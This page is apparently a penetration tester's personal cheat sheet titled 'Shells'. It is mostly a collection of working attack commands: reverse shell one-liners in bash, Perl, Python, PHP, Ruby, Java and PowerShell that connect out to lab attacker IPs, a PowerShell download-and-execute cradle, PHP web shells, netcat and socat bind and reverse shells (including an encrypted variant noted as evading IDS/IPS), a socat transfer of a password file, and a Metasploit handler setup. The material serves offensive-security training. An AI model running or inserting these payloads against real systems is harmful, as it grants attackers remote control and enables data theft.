Shells
Last updated
Was this helpful?
Last updated
Was this helpful?
BASH bash -i >& /dev/tcp/192.168.19.29/1234 0>&1 //can pu these in .sh files also and run them if you are trying to do local injects PERL perl -e 'use Socket;$i="192.168.19.29";$p=8385;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PYTHON python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.64.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' //send shell file and run c:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.20:8888/myshell.ps1') PHP php -r '$sock=fsockopen("127.0.0.1",5555);exec("/bin/sh -i <&3 >&3 2>&3");' RUBY ruby -rsocket -e'f=TCPSocket.open("192.168.19.29",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' NETCAT rshell: attack: nc -nlvp 4444 vic: nc -nv <ip> 4444 -e /bin/bash //or cmd.exe //no -e ? then: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.90.60.80 7777 >/tmp/f JAVA r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.5/7888;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() Reverse Shells hacktricks () Bash shell bash -i >& /dev/tcp/10.90.60.80/8888 0>&1 //this one was to feed it into systemctl gtfo bin: echo 'bash -c "bash -i >& /dev/tcp/192.168.19.27/12345 0>&1"' > shell.sh Netcat without -e flag rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.64.10 59919 >/tmp/f Netcat Linux nc -e /bin/bash 172.16.64.10 59919 Netcat Windows nc -e cmd.exe 192.168.19.26 12345 Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.23",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' Perl perl -e 'use Socket;$i="192.168.19.29";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Remote Desktop Remote Desktop for windows with share and 85% screen rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10 PHP PHP command injection from GET Request. Then navigate to the page and do ?cmd=whoami and then if it works(check burp also) then plant a shell command <?php echo system($_GET["cmd"]);?> -Alternatives <?php echo shell_exec($_GET["cmd"]);?> <?php system($_REQUEST['cmd']);?> <?php $output = shell_exec($_GET["cmd"]); echo "<pre>$output</pre>"; ?> Powershell //Non-interactive execute powershell file powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1 Powershell can also run payloads while the shell connection is made: PS>powercat -c 10.11.0.4 -p 443 -e cmd.exe -g > reverseshell.ps1 # nc -lvnp 443 PS>./reverseshell.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.14.20",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.19.26',7777);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" Misc More binaries Path export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/ucb/ //more PS //Test powershell >powershell whoami //should run command if we have powershell //we have ps1 shells in /usr/share/nishang/Shells/ //a good one to use for upgrading to a tty is: Invoke-PowerShellTcp.ps1
NetCat bind and reverse shells does not use encryption nor limit connection made to the ports. //check a specific port and displays its banner. #nc -nv 10.11.25.2 25 //-n no dns //-v verbose //In this case we see an SMTP server sistting here and we can communicate with the smtp service. We first type HELP and see a list of recognized smtp commands that we can send along with a account name that we are under. //Listener + Connection pair Listen #nc -nlvp 4444 Connect #nc -nv <ip> 4444 //This would set up a raw connection were we can send txt through. Much like a chat screen. //File transfers //transfer the wget executable #locate wget.exe //gives us “/usr/share/windows-binaries/wget.exe” Listen #nc -nlvp 4444>incoming.exe Connect #nc -nv <ip> 4444 < /usr/share/windows-binaries/wget.exe //note that we may not see the file transfer in the shell but we should check the directory after a few seconds/min to see if it is there. #nc <ip> 4444 < myfile.txt NC ouput nc stream to a file #nc <ip> 4444 > myfile.txt //Command execution //BIND Shell, typically wont work with firewalls ass incoming sesssions are stopped //vic #nc -nlvp 4444 -e cmd.exe //attaches stdin/out/err of cmd to the shell for use //attacker #nc -nv <ip> 4444 //Reverse Shell safer because we are not binding a shell to a port instead we let commands come into the port and then push them through to the shell. //attacker #nc -lvp 4444 //victem sends out session #nc -vn <> 4444 -e /bin/bash PORT SCAN: #nc -nvv -w 1 -z 10.10.10.10 3388-3390 //-w is the time out in seconds -z is used to specify zero data sending (connect scan only) //UDP flag -u nc -nv -u -z -w 1 10.11.1.115 160-162
-Typical NetCat bind and reverse shells does not use encryption nor limit connection made to the ports, However Ncat does. Encryption can help avoid IDS/IPS from triggering and connection limiters can help prevent data leakage durring a pentest and not limiting them can open up the company network. Ncat (note this is not nc) has some of this functionality. //Set up a Ncat shell with whitelist and encryption pg.65 //listener #ncat -lvp 4444 -e cmd.exe --allow <ip> --ssl /feeds input into cmd and only allows connections from specified IPs //connection #ncat -v <ip> 4444 --ssl
CONNECTION: Connector #socat - TCP4:10.10.10.10:443 Listener socat TCP4-LIStEN:443 STDOUT SENDING FILES: Linux sender: #socat TCP4-LISTEN:443,fork file:secret_passwords.txt Windows reciever: #socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create R-SHELL: Win Listen: (attacker) #socat -d -d TCP4-LISTEN:443 STDOUT //-d -d is increasing verbosity Linux reachout and provide shell: (vic) #socat TCP4:10.11.0.22:443 EXEC:/bin/bash ENCRYPTED BIND SHELL: (helps evaid IDS/IPS) ---Making a self signed cert. #openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36 2 -out bind_shell.crt //req and x509: creates the self signed cert //-newkey: makes a new private key //rsa:2048: rsa encryption with 2048bit key length //-nodes: store private key unencrypted //-keyout bind_shell.key: saves the key to this file //-days 3362: length of validity (days) //-out bind_shell.crt: save cert to file You will then have to specify things like location, and who after hitting enter. ----Combine the key and cert together into pem format which can be used more widely. #cat bind_shell.key bind_shell.crt > bind_shell.pem Listener: #socat OPENSSL-LISTEN:433,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash //OPENSSL-LISTEN:433 listen on 443 //cert=bind_shell.pem cert file //verify=0 turn off ssl verification //fork EXEC:/bin/bash fork out a child process Connect: #socat - OPENSSL:10.10.10.10.:433,verify=0
How to set up a multihandler and not sue an exploit: #msfconsole >use exploit/multi/handler >set lhost tun0 >set lhost tun0 >set lport 1337 >set payload windows/meterpreter/reverse_tcp >run -j Troubleshoot: Sometimes you might get a restricted shell with thinks like BOFs so you will want to switch into another process with #ps then 'migrate' to the pid.
Do first:
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy
R_SHELL: Win connect: >powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10. 11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()" kali listener: sudo nc -lnvp 443 BIND-SHELL: Win listener: > powershell -c "$listener = New-Object System.Net.Sockets.TcpListener( '0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $clie nt.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt es.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString ($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$str eam.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Sto p()" //kali connector $ nc -nv 10.11.0.22 443